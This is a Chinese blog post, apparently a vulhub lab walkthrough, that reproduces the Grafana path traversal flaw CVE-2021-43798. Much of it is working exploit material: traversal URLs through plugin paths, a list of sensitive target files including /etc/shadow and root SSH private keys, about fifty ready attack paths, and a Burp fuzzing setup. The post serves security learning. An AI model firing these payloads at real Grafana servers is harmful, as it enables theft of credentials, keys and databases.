0
点赞
收藏
分享

微信扫一扫

[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798

文章目录

一、漏洞编号

CVE-2021-43798

二、漏洞描述

三、影响范围

Grafana 8.0.0 - 8.3.0

四、环境搭建

1、进入 CVE-2021-43798环境

cd CVE-2021-43798

在这里插入图片描述

2、启动 CVE-2021-43798环境

docker-compose up -d

在这里插入图片描述

3、查看 CVE-2021-43798环境

docker-compose ps

在这里插入图片描述

4、访问 CVE-2021-43798环境

http://192.168.13.131:3000/

在这里插入图片描述

5、查看 CVE-2021-43798提示信息

cat README.md 

在这里插入图片描述

6、关闭 CVE-2021-43798环境

docker-compose down

在这里插入图片描述

五、漏洞复现

1、POC(攻击路径):

<grafana_host_url>/public/plugins/<“plugin-id”>其中<“plugin-id”>是任何已安装插件的插件ID。

2、读取etc/passwd

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd

在这里插入图片描述

3、读取Grafana配置文件

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini

在这里插入图片描述

4、读取Grafana数据库

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db

在这里插入图片描述

5、其他可获取的文件

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline

6、可攻击路径清单

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

7、Grafana默认安装插件列表

alertlist
annolist
grafana-azure-monitor-datasource
barchart
bargauge
cloudwatch
dashlist
elasticsearch
gauge
geomap
gettingstarted
stackdriver
graph
graphite
heatmap
histogram
influxdb
jaeger
logs
loki
mssql
mysql
news
nodeGraph
opentsdb
piechart
pluginlist
postgres
prometheus
stat
state-timeline
status-history
table
table-old
tempo
testdata
text
timeseries
welcome
zipkin

六、Bp爆破模块进行fuzz测试

1、准备字典

在这里插入图片描述
在这里插入图片描述

2、爆破模块设置

设置爆破点

在这里插入图片描述

导入字典

在这里插入图片描述

开始爆破

在这里插入图片描述

3、爆破成功

查看请求包

在这里插入图片描述

查看返回包

在这里插入图片描述

七、修复方式

升级至最新版本

举报

相关推荐

0 条评论